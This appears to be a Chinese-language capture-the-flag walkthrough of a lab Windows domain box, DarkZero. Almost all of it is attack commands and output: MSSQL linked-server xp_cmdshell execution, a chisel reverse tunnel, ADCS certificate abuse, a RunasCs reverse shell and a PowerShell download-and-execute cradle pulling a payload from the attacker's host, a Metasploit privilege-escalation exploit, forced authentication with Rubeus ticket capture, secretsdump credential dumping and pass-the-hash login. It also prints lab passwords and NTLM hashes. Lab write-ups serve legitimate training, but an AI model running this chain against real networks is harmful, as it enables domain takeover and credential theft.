基本信息

1
As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!

端口扫描

1433和常规windows域端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
$ nmap -sC -sV -Pn 10.10.11.89
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-08 15:35 JST
Nmap scan report for 10.10.11.89
Host is up (0.19s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-08 13:10:52Z)
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
1433/tcp open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-10-08T13:12:17+00:00; +6h33m14s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-08T13:10:02
|_Not valid after:  2055-10-08T13:10:02
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h33m14s, deviation: 0s, median: 6h33m13s
| smb2-time:
|   date: 2025-10-08T13:11:39
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.47 seconds

bloodhound

给了初始账号,添加hosts后从常规bloodhound开始:

1
2
3
10.10.11.89 darkzero.htb dc01.darkzero.htb dc01

bloodhound-python -d darkzero.htb -u john.w -p 'RFulUtONCOL!' -ns 10.10.11.89 -c All --zip

不过这台机器基本用不到bloodhound里的信息

mssql

给的账号可以登录mssql:

1
python3 examples/mssqlclient.py darkzero.htb/john.w:'RFulUtONCOL!'@10.10.11.89 -windows-auth

并且可以作为guest使用xp_dirtree,虽然暂时没什么用,只是机器hash:

1
SQL (darkzero\john.w  guest@master)> xp_dirtree \\10.10.14.9\miao

linked server

但linked server有一个DC02.darkzero.ext:

1
2
3
SQL (darkzero\john.w  guest@master)> use_link "DC02.darkzero.ext"
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)> enable_xp_cmdshell
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)> xp_cmdshell whoami

svc_sql shell

所以直接xp_cmdshell获取svc_sql shell:

1
xp_cmdshell "powershell xxxxx"

svc_sql to DC02$

这里就有非预期方法了,预期方法大概这样:

首先设置环境

1
2
3
4
5
6
7
8
9
10
11
12
13
# local
$ ./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse

# target
meterpreter > upload chisel.exe

Start-Job -ScriptBlock {C:\temp\chisel.exe client 10.10.14.9:9999 R:socks}

# hosts
172.16.20.2 dc02.DARKZERO.EXT

# mac 同步时间
sudo sntp -sS 10.10.11.89

Policy_Backup

C盘根目录可以看到一个Policy_Backup.inf文件,看起来是组策略备份,其中可以看到SeImpersonatePrivilege分配给了S-1-5-6即SERVICE组,svc_sql 也是该组成员,但因为UAC当前shell中并没有SeImpersonatePrivilege这个权限:

1
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6

ADCS get svc_sql

所以我们需要稍微绕一下,通过认证来获取svc_sql 完整权限:

1
2
3
4
5
6
7
8
meterpreter > upload /Users/miao/Tools/Offsec/Certify.exe

C:\temp>Certify.exe request /ca:DC02\darkzero-ext-DC02-CA /template:User
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

proxychains4 certipy auth -pfx cert.pfx -u svc_sql -domain darkzero.ext -dc-ip 172.16.20.2

[*] Got hash for 'svc_sql@darkzero.ext': aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f

svc_sql full power

得到了svc_sql hash后常规方式不能登录,直接修改密码后runas切换:

1
2
3
4
5
proxychains4 python3 examples/changepasswd.py svc_sql@darkzero.ext -hashes :816ccb849956b531db139346751db65f -newpass 'StrongPassword123' -dc-ip 172.16.20.2

meterpreter > upload RunasCs.exe

PS C:\temp> .\RunasCs.exe svc_sql 'StrongPassword123' powershell -l 5 -b -r 10.10.14.9:4444

这样就得到了有SeImpersonatePrivilege的完整svc_sql :

svc_sql to DC02$

之后就是一键getsystem了:

1
IEX ((new-object net.webclient).downloadstring('http://10.10.14.9:7777/msf.ps1'))

非预期 LPE

CVE方式直接提升到system:

1
msf6 > use exploit/windows/local/cve_2024_30088_authz_basep

dc02 hashdump

svc_sql是已经被修改了密码后的hash:

1
2
3
4
5
6
7
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:69d8ed878401176eb6db4d53e57c6127:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:4276fdf209008f4988fa8c33d65a2f94:::

user flag

DC02 Administrator桌面:

DC02 to DC01 & root flag

现在有了DC02的system,前面也知道可以通过mssql强制DC01访问,DC02和DC01双向信任且默认非约束委派,所以直接强制访问提取票据即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# DC02 system
Rubeus.exe monitor /interval:5 /nowrap

# mssql
python3 examples/mssqlclient.py darkzero.htb/john.w:'RFulUtONCOL!'@10.10.11.89 -windows-auth
SQL (darkzero\john.w  guest@master)> xp_dirtree \\DC02.darkzero.ext\miao

# DC02 rubeus获取到DC01$@DARKZERO.HTB ticket
cat dc01.b64| base64 -d > dc01.kirbi
python3 examples/ticketConverter.py dc01.kirbi dc01.ccache

# 使用dc01票据
export KRB5CCNAME=dc01.ccache
python3 examples/secretsdump.py darkzero.htb/dc01\$@dc01.darkzero.htb -k -no-pass -dc-ip 10.10.11.89 -just-dc-user Administrator

5917507bdf2ef2c2b0a869a1cba40726

root flag

得到Administrator后登录即可:

1
evil-winrm -i 10.10.11.89 -u Administrator -H 5917507bdf2ef2c2b0a869a1cba40726

dc01 hashdump

1
2
3
4
5
6
7
8
python3 examples/secretsdump.py darkzero.htb/dc01\$@dc01.darkzero.htb -k -no-pass -dc-ip 10.10.11.89 -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:64f4771e4c60b8b176c3769300f6f3f7:::
john.w:2603:aad3b435b51404eeaad3b435b51404ee:44b1b5623a1446b5831a7b3a4be3977b:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a:::
darkzero-ext$:2602:aad3b435b51404eeaad3b435b51404ee:95e4ba6219aced32642afa4661781d4b:::

参考资料